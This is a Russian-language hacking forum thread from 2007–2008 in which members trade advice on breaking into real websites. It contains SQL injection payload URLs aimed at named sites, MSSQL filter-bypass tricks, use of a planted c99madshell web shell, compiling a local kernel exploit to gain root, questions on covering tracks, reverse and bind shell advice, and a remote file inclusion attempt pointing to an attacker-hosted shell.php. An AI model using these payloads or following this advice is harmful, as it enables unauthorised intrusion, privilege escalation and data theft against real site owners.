Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    дело совсем в другом, а именно в самих правах доступа drw-r--r- к примеру..

    есть статья в нашизх статьях, ищи.
     
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Велемир, там надо лимитом пользоваться:
    Code:
    http://www.laptopshowcase.co.uk/suppliers.php?id=-1%20GROUP%20BY%20suppliers.id%20union%20select%201,2,name,4,5,6,7,8,9%20from%20suppliers%20limit%201,1/*
     
    1 person likes this.
  3. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    права доступа

    Спасибо, blackybr! :)

    Подскажите, как можно и через что получить в Linux доступ к файлам root/adm, которые открыты только для этого пользователя и закрыты для группы, если есть c99madshell с правами uid=33(www-data) gid=33(www-data) groups=33(www-data) ?

    Спасибо!
     
    #1443 fervex, 30 Mar 2008
    Last edited: 30 Mar 2008
  4. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    fervex поднять права, к примеру порутать серв. от рута ты сам сможешь права ставить любые
     
  5. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    порутать Linux сервер

    Спасибо, blackybr!
    а порутать серв можно с помощью сплойта или ещё как?
    посоветуйте, что почитать можно по рутанью Linux сервера, если залит c99madshell?
     
  6. Анжелика

    Анжелика Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    25
    Likes Received:
    36
    Reputations:
    -4
    выполняешь uname -a , смотришь версию ядра и ищешь сплоиты под эту версию
     
  7. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    запуск exploit на Linux

    Спасибо, Анжелик!
    Linux webserver2 2.6.15-26-server #1 SMP Aug 2006 i686 GNU/Linux
    Версию знаю, сплоит нашёл - http://www.milw0rm.com/exploits/2006

    А если я его выполню в c99madshell через: gcc raptor_prctl.c -o raptor_prctl -Wall
    ./raptor_prctl

    то какой будет результат в итоге? у меня у c99madshell'a появятся права root на эту сессию, или навсегда? или ещё что? не запалит ли это меня, и как замести следы?
     
    #1447 fervex, 30 Mar 2008
    Last edited: 30 Mar 2008
    1 person likes this.
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Scipio, спасибо - уже большой плюс))))))).Осталось гадать )
     
  9. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    fervex тебе нужно забиндить порт или сбэкконектиться (желаетльно чтобы псевдотерминад поддердживался скриптом) и только потом запускать, так сказать интерактивно
     
  10. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Проблема в следующем, есть скуль, бд - mssql, на кавычку идет фильтр, пытаюсь вытянуть что-нибудь следующим запросом - http://www.xxx.com/number.asp?id=45509+or+1=(select+top+1+table_name+from+information_schema.columns+where+column_name=char(112,97,115,115,119,111,114,100)--
    В ответ ошибка - The char function requires 1 arguments.
    Что не так, и как можно обойти ?
     
  11. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    удобнее хексить, но и charить можно, только не как в мускуле, а каждый сисмвол в отдельную функцию соединяя плюсам, в гет запросах %2B:
    http://www.xxx.com/number.asp?id=45509+or+1=(select+top+1+table_name+ from+information_schema.columns+where+column_name= char(112)%2Bchar(97)%2Bchar(115) и т.д кстати ты перед -- скобку) пропустил
     
    1 person likes this.
  12. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 Scipio
    Хм, а хексить как ? А то через чар таким образом муторно =/
     
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    я обычно SIPT пользую так как стоит у меня, а вобще таких прог много:
    http://forum.antichat.ru/thread24918.html
     
  14. Климент_Ворошилов

    Joined:
    8 Dec 2007
    Messages:
    21
    Likes Received:
    10
    Reputations:
    0
    Вопрос такой. Возможно ли определить наличие таблицы не используя union? То бишь я предполагаю, что в БД есть таблица, ну к примеру admin, можно ли определить есть такая таблица или нет?
    Заранее мерси всем ответившим.
     
  15. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Нет
     
    1 person likes this.
  16. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    Как не заливая шелла найти админку, мож кто адреса админок самые такие популярные скинет ?
     
  17. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    www.ru/admin/
    www.admin.site.ru/
    www.ru/adm/
    www.ru/administrator/
    www.ru/pma/
    www.ru/PhpMyAdmin/
    ....
     
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Есть инклуд на сайте,с раскрытием пути.

    http://rusxmms.sourceforge.net/index.php?page=home/groups/r/ru/rusxmms/htdocs/index.php

    Warning: main(gaga.php): failed to open stream: No such file or directory in /home/groups/r/ru/rusxmms/htdocs/index.php on line 39

    Warning: main(): Failed opening 'gaga.php' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/r/ru/rusxmms/htdocs/index.php on line 39

    Вопрос: Как определить, статическое значение здесь или переменное? (нубский вопрос,но инклуды я ещё ниразу не юзил:РР). И ещё- можно ли её эксплуатировать(залить шелл на хостинг и перенаправить), если там не работает запрос HTTP вида

    http://rusxmms.sourceforge.net/index.php?page=http://iadebilko.ru/padonag/shell.php

    .Выдаёт Access Denied! - аналогично, если в файл передавать различные символы).

    P.S. Пожалуйста, разъясните всё подробно - гайды читал,но многого не понял. Но это стопудо не глобальный инклудинг, ибо на GET- запросы ему тоже насрать - http://rusxmms.sourceforge.net/index.php?page=http://rambler.ru?

    В этом случае бы просто расширение .xxx, в данном случае - php, отбросилось бы как гет параметр и я бы перешёл на рембелр ру.
     
    #1458 Велемир, 30 Mar 2008
    Last edited: 30 Mar 2008
  19. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    на сурсфордже url access disabled, то есть можно инклудить только локальные файлы
     
  20. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Эмм... а как ты узнал?:Р И,в таком случае, как здесь использовать локальный инклуд? (о.О).
     
Thread Status:
Not open for further replies.